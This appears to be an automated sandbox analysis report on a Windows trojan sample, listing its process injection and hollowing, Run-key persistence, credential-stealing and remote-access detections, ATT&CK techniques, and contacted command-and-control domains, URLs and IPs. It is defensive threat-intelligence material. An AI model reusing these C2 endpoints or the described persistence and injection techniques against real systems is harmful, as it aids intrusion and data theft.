          Source: ByteCodeGenerator.exe, 00000003.00000003.562672294.0000000005259000.00000004.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000002.571105536.0000000005250000.00000040.10000000.00040000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000003.564011297.00000000055DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
          Source: explorer.exe, 00000004.00000000.477624235.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.529461313.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.508931900.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: YProgram Managerf
          Source: explorer.exe, 00000004.00000000.477624235.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.529461313.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.508931900.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 3.0.ByteCodeGenerator.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.ByteCodeGenerator.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.ByteCodeGenerator.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.ByteCodeGenerator.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.ByteCodeGenerator.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.ByteCodeGenerator.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.ByteCodeGenerator.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000000.471199219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.470778539.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.707469060.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.533300024.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.513489612.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.487374826.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.707690856.0000000003980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.470404681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.487565258.0000000004C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.568261585.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.568042051.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.489825108.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 3.0.ByteCodeGenerator.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.ByteCodeGenerator.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.ByteCodeGenerator.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.ByteCodeGenerator.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.ByteCodeGenerator.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.ByteCodeGenerator.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.ByteCodeGenerator.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000000.471199219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.470778539.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.707469060.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.533300024.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.513489612.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.487374826.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.707690856.0000000003980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.470404681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.487565258.0000000004C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.568261585.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.568042051.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.489825108.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Scheduled Task/Job
          1
          Scheduled Task/Job
          512
          Process Injection
          1
          Masquerading
          OS Credential Dumping221
          Security Software Discovery
          Remote Services1
          Archive Collected Data
          Exfiltration Over Other Network Medium1
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts1
          Shared Modules
          Boot or Logon Initialization Scripts1
          Scheduled Task/Job
          1
          Disable or Modify Tools
          LSASS Memory2
          Process Discovery
          Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
          Ingress Tool Transfer
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion
          Security Account Manager31
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)512
          Process Injection
          NTDS1
          Remote System Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer13
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information
          LSA Secrets112
          System Information Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Hidden Users
          Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items4
          Obfuscated Files or Information
          DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job3
          Software Packing
          Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 640202 Sample: SecuriteInfo.com.Variant.Te... Startdate: 06/06/2022 Architecture: WINDOWS Score: 100 36 www.rapiturs.com 2->36 38 www.budurr.com 2->38 44 Snort IDS alert for network traffic 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 Multi AV Scanner detection for submitted file 2->48 50 7 other signatures 2->50 11 SecuriteInfo.com.Variant.Tedy.130342.18814.exe 1 2->11         started        signatures3 process4 file5 28 SecuriteInfo.com.V...30342.18814.exe.log, ASCII 11->28 dropped 14 ByteCodeGenerator.exe 11->14         started        process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 2 other signatures 14->64 17 explorer.exe 14->17 injected process8 dnsIp9 30 td-ccm-168-233.wixdns.net 34.117.168.233, 49862, 80 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 17->30 32 www.loveuco.com 203.170.80.250, 49863, 80 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU Australia 17->32 34 5 other IPs or domains 17->34 40 System process connects to network (likely due to code injection or exploit) 17->40 42 Performs DNS queries to domains with low reputation 17->42 21 explorer.exe 17->21         started        signatures10 process11 signatures12 52 Modifies the context of a thread in another process (thread injection) 21->52 54 Maps a DLL or memory area into another process 21->54 56 Tries to detect virtualization through RDTSC time measurements 21->56 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          SecuriteInfo.com.Variant.Tedy.130342.18814.exe28%VirustotalBrowse
          No Antivirus matches
          SourceDetectionScannerLabelLinkDownload
          3.2.ByteCodeGenerator.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
          3.0.ByteCodeGenerator.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
          3.0.ByteCodeGenerator.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
          3.0.ByteCodeGenerator.exe.400000.3.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
          12.2.explorer.exe.f50000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          3.0.ByteCodeGenerator.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
          12.0.explorer.exe.f50000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          3.2.ByteCodeGenerator.exe.5250000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          SourceDetectionScannerLabelLink
          td-ccm-168-233.wixdns.net0%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://www.coraroseromance.net/aet3/?l48p=X6tC1H3r17TreXHELX+2yuKJ2Zy3hFZBFF1ZVzxWbyQ4jAOrOCxIDAhBMXT7pXuuuH38&vHn=5j90bfXx9vsx0%Avira URL Cloudsafe
          www.coraroseromance.net/aet3/0%Avira URL Cloudsafe
          https:///AzureRMAudienceEndpoint;https://management.azure.com/5https://graph.windows.net/Ihttps://ma0%Avira URL Cloudsafe
          http://www.fuugiti.xyz/aet3/?l48p=ETTjY0N9an1X8aIG5qXNacvciRNZbdUKCcrOLt6RrRurIWhPmRExX4B7f0/al7kq5FJE&vHn=5j90bfXx9vsx0%Avira URL Cloudsafe
          https://www.coraroseromance.net/aet3?l48p=X6tC1H3r17TreXHELX0%Avira URL Cloudsafe
          http://www.foldemforever.com/aet3/?l48p=kapzR8JPYtO2Wg0hfvI2cMfxoG1KoiKvyBJf4rs85HfCQVdH/hem3I02OclTyA2jLT1l&vHn=5j90bfXx9vsx0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          www.loveuco.com
          203.170.80.250
          truetrue
            unknown
            td-ccm-168-233.wixdns.net
            34.117.168.233
            truetrueunknown
            foldemforever.com
            34.102.136.180
            truefalse
              unknown
              www.fuugiti.xyz
              104.21.18.171
              truetrue
                unknown
                www.budurr.com
                173.239.8.164
                truefalse
                  unknown
                  www.rapiturs.com
                  162.213.255.237
                  truetrue
                    unknown
                    www.coraroseromance.net
                    unknown
                    unknowntrue
                      unknown
                      www.foldemforever.com
                      unknown
                      unknowntrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        http://www.coraroseromance.net/aet3/?l48p=X6tC1H3r17TreXHELX+2yuKJ2Zy3hFZBFF1ZVzxWbyQ4jAOrOCxIDAhBMXT7pXuuuH38&vHn=5j90bfXx9vsxtrue
                        • Avira URL Cloud: safe
                        unknown
                        www.coraroseromance.net/aet3/true
                        • Avira URL Cloud: safe
                        low
                        http://www.fuugiti.xyz/aet3/?l48p=ETTjY0N9an1X8aIG5qXNacvciRNZbdUKCcrOLt6RrRurIWhPmRExX4B7f0/al7kq5FJE&vHn=5j90bfXx9vsxtrue
                        • Avira URL Cloud: safe
                        unknown
                        http://www.foldemforever.com/aet3/?l48p=kapzR8JPYtO2Wg0hfvI2cMfxoG1KoiKvyBJf4rs85HfCQVdH/hem3I02OclTyA2jLT1l&vHn=5j90bfXx9vsxfalse
                        • Avira URL Cloud: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://login.microsoftonline.com/SecuriteInfo.com.Variant.Tedy.130342.18814.exe, SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.478773261.0000000000952000.00000020.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000000.437129193.0000000000952000.00000020.00000001.01000000.00000003.sdmpfalse
                          high
                          https:///AzureRMAudienceEndpoint;https://management.azure.com/5https://graph.windows.net/Ihttps://maSecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.478773261.0000000000952000.00000020.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000000.437129193.0000000000952000.00000020.00000001.01000000.00000003.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          https://graph.windows.net/SecuriteInfo.com.Variant.Tedy.130342.18814.exefalse
                            high
                            https://login.microsoftonline.com/)AadApplicationTenantIf8cdef31-a31e-4b4a-93e4-5f571e91255aSecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.478773261.0000000000952000.00000020.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000000.437129193.0000000000952000.00000020.00000001.01000000.00000003.sdmpfalse
                              high
                              https://www.coraroseromance.net/aet3?l48p=X6tC1H3r17TreXHELXexplorer.exe, 0000000C.00000002.714030673.0000000005C32000.00000004.10000000.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://management.azure.com/SecuriteInfo.com.Variant.Tedy.130342.18814.exefalse
                                high
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                104.21.18.171
                                www.fuugiti.xyzUnited States
                                13335CLOUDFLARENETUStrue
                                203.170.80.250
                                www.loveuco.comAustralia
                                38719DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUtrue
                                34.102.136.180
                                foldemforever.comUnited States
                                15169GOOGLEUSfalse
                                34.117.168.233
                                td-ccm-168-233.wixdns.netUnited States
                                139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGtrue
                                Joe Sandbox Version:35.0.0 Citrine
                                Analysis ID:640202
                                Start date and time: 06/06/202223:30:222022-06-06 23:30:22 +02:00
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 12m 35s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:SecuriteInfo.com.Variant.Tedy.130342.18814.29997 (renamed file extension from 29997 to exe)
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:22
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:1
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.expl.evad.winEXE@7/1@6/4
                                EGA Information:
                                • Successful, ratio: 66.7%
                                HDC Information:
                                • Successful, ratio: 48.8% (good quality ratio 44.8%)
                                • Quality average: 71.7%
                                • Quality standard deviation: 31.4%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 146
                                • Number of non-executed functions: 160
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 52.242.101.226, 52.152.110.14, 40.125.122.176, 20.223.24.244, 20.54.89.106
                                • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, licensing.mp.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                • Execution Graph export aborted for target SecuriteInfo.com.Variant.Tedy.130342.18814.exe, PID 7000 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                TimeTypeDescription
                                23:33:55AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run -Z9L_RJ0AN4 C:\Program Files (x86)\Lnp-47bm\chkdsk_0slor5.exe
                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                203.170.80.250gZU26RjMUU.exeGet hashmaliciousBrowse
                                • www.exceedrigging.online/ocgr/?8p=qVwdVxLX0&1bEX=lpHABYYuY9cv3qxwBx7M5sV/ehU3dY7dp0OhYiYvhJ7rkfr4y7gNIHxTi8LWiO7UdxYH
                                ENCOMENDA LOIAS BARRO.xlsxGet hashmaliciousBrowse
                                • www.exceedrigging.online/ocgr/?udwl-=lpHABYYrY6cr3698Dx7M5sV/ehU3dY7dp0WxEhEulp7qkuH+1rxBeDJRhaHQp/vfIXswjA==&bDHTL=XL0tsfBPFZ
                                SecuriteInfo.com.Variant.MSILHeracles.36859.7349.exeGet hashmaliciousBrowse
                                • www.goodlordy.net/tn61/?oL3LlJe=11Y0jg2guPgWMpDOrlnJajYS6uNk4svBrv7OHBQ/XILJr+M/OrnfiCKZ18ANmYSJ8MD7&l0Dlp=cZ2PFFnHMnDxhx
                                triage_dropped_file.exeGet hashmaliciousBrowse
                                • www.onlinearttherapytraining.store/pogm/?Wd6po=7nFLSLwH3XR&Z2ML=0d3xZoIp0kdes9ny5pi7TBsliBznwHfCiFYRa4QbtIZLgEYLLH9jxfu/V6ACadxLtEiR
                                NIEUWE AANKOOPORDER.exeGet hashmaliciousBrowse
                                • www.keepcharged.online/s4ig/?UV8810Q=jWXH379Df8ztfRkrXn63Xlz5pUC92+8eRclzTdM4WwojYTfL0XSfonU8MTFuKLTRV6Wb&u8=4htl94fpy
                                SWIFT Message.xlsxGet hashmaliciousBrowse
                                • www.hypotheque.xyz/u6vb/?6lip4=trAhLfEH&Sl-pp4=c3IKG2JsHNtK5zl36fCvIXy36K8P53oVDVMMpHFW1VhyR0x4TQnK1PBS6C4g5RbAiUShcQ==
                                Booking number 63200IN437668.exeGet hashmaliciousBrowse
                                • www.vinayagar.xyz/dvcw/?e6m0BD=sf+UYiDhtehr5fU3UUK4lZTAKcVjt5jfQy4PZuU9KVGDENPpP5JBNe4RxtXTmspsivq9&_txtHD=LZqLWroXC
                                ODFkNglL18.exeGet hashmaliciousBrowse
                                • www.hypotheque.xyz/u6vb/?d2=c3IKG2JpHKtO5jp74fCvIXy36K8P53oVDVUc1EZXx1hzRFd+UA2GjL5Q5nU29BfzpXPR&4hLT6=9r_Xq4bPK8itcl2p
                                LyY2cmtWjb.exeGet hashmaliciousBrowse
                                • www.tehoierenursery.online/dpzz/?oBZh=nQxT3wtJ43goNFGbqxp3LLqoykZM+ebY85UW0yuEn/s6viNE+8TCyMtn3mH9SRJKgY/JfUEO7Q==&i0=xHvXCL
                                j2dNDqM2JY.exeGet hashmaliciousBrowse
                                • www.farmstoragesolution.com/h4d0/?2dYhmpu=F2rrJ5ReEd4LrP5/UuuH3AoM21qgVCpNiBAHACju9J0ow42Hi84AgvxBuz92v76uvptG&k2MT5=bZB0dRC8
                                purchase_order.exeGet hashmaliciousBrowse
                                • www.universitysuccess.net/fui6/?3fdLibf0=RwFJjzagwk1eo6/3hqfDiQm8y5W2E1C6wzdG7Cu4zQwdVTcBTAvnDThO0YpyxPTvtm+4&yD=od94ulb0
                                9nM1eSsQgX.exeGet hashmaliciousBrowse
                                • www.mugsmindset.online/sbp5/?8p=rGgRi1v2ZQtEhSvMK9/Z4o4A37pNj53pyOvHh8zdl7xQErTb2p9Byy/EEdKTjOL/bmlG&0L00=4hwxUT-XILw
                                justifika Payment details.exeGet hashmaliciousBrowse
                                • www.a-mech.online/g0s6/?fTyPr=rotWKh0O+5j4vKXnlvS7GL1M6aL5f3/63WCE3rSYmjfM/i3pj0MQo4LlqtWGlZ2EA1W8&I4ah=w2MTqnnpWZSPKVw0
                                draft_inv dec21.exeGet hashmaliciousBrowse
                                • www.mackthetruck.com/n8ds/?pB=z2JtXhtxAhidvN&gHl=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL
                                hNfqWik7qw.exeGet hashmaliciousBrowse
                                • www.adelaideofficefitouts.com/rht9/?2d=d2RqHiFP7GtRsEFRKn4ztcJimb1zZosbxe5lPiT3HeEgy+1zxLvhIbh4BNC8Wn2mcAjG&NTiPcP=i488q
                                STATEMENT .docGet hashmaliciousBrowse
                                • www.mentation.online/bcwg/?CB3=YVmXGh8&eZ=yiId+2ekP1XS4WwOOSMXCrdt22hgudsZh6QSgOVem0oOHO44eh2BiSC3PJghWo4IKeaAnw==
                                BL_CI_PL.exeGet hashmaliciousBrowse
                                • www.mackthetruck.com/n8ds/?lZOD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&E0Dpk=l8hHaF
                                LBHkeG0UJk1YkgS.exeGet hashmaliciousBrowse
                                • www.tileonsale.online/a96n/?3fe=PBIGLrxEdW1ARb4E4Y/g+5oa3ioxDHC57jksxPNeqemN6ZgQynee/Bq7aFoZn10xYjrn&p6DDcf=5j0lqHmh
                                Zr26f1rL6r.exeGet hashmaliciousBrowse
                                • www.mackthetruck.com/n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z
                                DHL express 5809439160_pdf.exeGet hashmaliciousBrowse
                                • www.milanecollective.online/asva/?kPMHc8=_0Dd-Hq&0DHp3RF=7aaX/J2ETrbHcNqJ083e19LFvcBNT4ZfrDwr//xwcvRFhpQMdOXGJNS6rbnCanORiSHJi1ccfQ==
                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                td-ccm-168-233.wixdns.netOrder confirmation 5679021.exeGet hashmaliciousBrowse
                                • 34.117.168.233
                                SecuriteInfo.com.Variant.MSILHeracles.37221.26211.exeGet hashmaliciousBrowse
                                • 34.117.168.233
                                statement of account.exeGet hashmaliciousBrowse
                                • 34.117.168.233
                                SecuriteInfo.com.Gen.Variant.Nemesis.7037.24196.exeGet hashmaliciousBrowse
                                • 34.117.168.233
                                two_months_salary_receipts.exeGet hashmaliciousBrowse
                                • 34.117.168.233
                                BILL OF LADING-CI-PL-BL_xlsx.exeGet hashmaliciousBrowse
                                • 34.117.168.233
                                Bill Of Lading-Original_xlsx.exeGet hashmaliciousBrowse
                                • 34.117.168.233
                                Commercial Invoice_xlsx.exeGet hashmaliciousBrowse
                                • 34.117.168.233
                                PackingList_xlsx.exeGet hashmaliciousBrowse
                                • 34.117.168.233
                                DHL Delivery Exception.exeGet hashmaliciousBrowse
                                • 34.117.168.233
                                SWIFT_Copy.exeGet hashmaliciousBrowse
                                • 34.117.168.233
                                dD2niauWUc.exeGet hashmaliciousBrowse
                                • 34.117.168.233
                                listXofXP.O.docGet hashmaliciousBrowse
                                • 34.117.168.233
                                m16h7WmaNB.exeGet hashmaliciousBrowse
                                • 34.117.168.233
                                TETSA ISI PRICE-STOCK REQUEST.exeGet hashmaliciousBrowse
                                • 34.117.168.233
                                2wPn8Csqon.exeGet hashmaliciousBrowse
                                • 34.117.168.233
                                Company Profile.exeGet hashmaliciousBrowse
                                • 34.117.168.233
                                https://businessadmin.org/Get hashmaliciousBrowse
                                • 34.117.168.233
                                swift copy 6209143.exeGet hashmaliciousBrowse
                                • 34.117.168.233
                                TT COPY Euro 57,890_CI0099484_pdf.vbsGet hashmaliciousBrowse
                                • 34.117.168.233
                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                CLOUDFLARENETUSmirai.armGet hashmaliciousBrowse
                                • 162.159.107.63
                                https://u27223624.ct.sendgrid.net/ls/click?upn=lXMq6SwSkfecES5XpB-2FX61rwHHnpblHhrGRmaHQeozgPgN9I7UAght-2Fa9VCBfLfv1DabrxxqXKW2wHtVhpvG0rJhpRTMnOWvPTupsR2utc-2FrMAAlt9NmMhrKA3Vl4BNu0MW7Il1xmVODr3-2FMjhIS7LMsE0MDJFBoTzaquOvNJuw3KnQLr9n6lGYToFOWPqd2qdsr_LeMOfyZfDbx9s8KYxuEQmlXXvNFAZly1SNTZtfJY0h806ud-2B2He1ljQ0JQ7F3yswgQQptwkwyGfFeV857rx8jJbpapJw1C1hanu7YpSxDlhrYgoWDHrwOF9wWnz6c73xVSvCA5GGMy30Sz9lZmnKiKmTOa6AEB8vJFpe2sW-2BK5ThiULizQ-2FbiJRiO0cW-2BoAV527Pxck5m9aC9o4Kb0a6IDogcCwJIOOXR24h2pOGYru-2BpybSfUO0B1qDP2D2S8bJCZOoTf0NtKNs6NP-2BSyYPjZAHH8CYLfLgace5sEc-2B9KkDB5qN9FdhHmXSo-2FNJgeAKSRrD6kq4UW7mLZ4feFW0IRaDgJwMdQHsBEulRj26yaWyQnNFbTL32tvL2XvPn4IEB59hdWh9av1s8wDFvYfOSP1emGAjlqv03AfRegXfXYpMOZ6z-2Bw32jH3i1nBpEDGYopcqJhZ6fSeY1r0b7-2BXq294mvKddBuXAoR8uYuhQzN5vjwtFRF4i-2FnhoZVqT550dIY0jJhJpZx5HdrfwAplgSJyaqMvVT5YDLP6zFtmSIxtUr2ULHDiyoC2ZeqZDSbqulIIOcnTk2Pwd8WBHvacvVD-2Bc14yHPgk70lOryJY9e5qnMr5sixEpEssdq6UpEfwSExOejnb0neJefSFJItVVdjRr9FwLylIn4Rz-2BYQWyfT06kEDXzC7-2Fb-2BRgr2Nte7zPjF9J6H6dWZ3TO4L5C7JMSnySolrLXcUUAP5umX2p